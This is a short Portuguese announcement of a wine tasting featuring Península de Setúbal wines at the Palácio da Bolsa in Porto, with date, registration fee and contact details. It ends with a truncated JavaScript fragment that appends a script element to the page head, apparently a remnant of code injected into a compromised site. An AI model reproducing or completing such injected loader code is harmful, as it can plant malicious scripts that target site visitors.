Prova Vinhos da Península de Setúbal no Porto

Os vinhos da Península de Setúbal são o foco da prova que é realizada na próxima sexta-feira, dia 29 de Maio, pelas 18h30, na Sala de Provas dos Vinhos de Portugal, no Palácio da Bolsa. A prova está inserida na temática da diversidade dos Vinhos de Portugal e é organizada em conjunto com a Comissão Vitivinícola da Península de Setúbal.

Nesta prova serão apresentados e colocados em degustação vinhos feitos a partir de castas autóctones. A região da Península de Setúbal varia entre zonas planas e arenosas e a paisagem mais montanhosa da Serra da Arrábida. Compreende as Denominações de Origem, “Palmela” e “Setúbal” e a IG Península de Setúbal, estando a denominação “Setúbal” reservada para os vinhos Moscatel de Setúbal e Moscatel Roxo.

As inscrições para a prova poderão ser efectuadas para o endereço provas.salaporto@viniportugal.pt, mediante o pagamento de 5€. Outras informações poderão ser solicitadas a Daniela Macedo, através deste mesmo endereço de e-mail ou do telefone 22 33 23 072/ 96 637 11 02.      

Fonte:  Wines of Portugal}if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);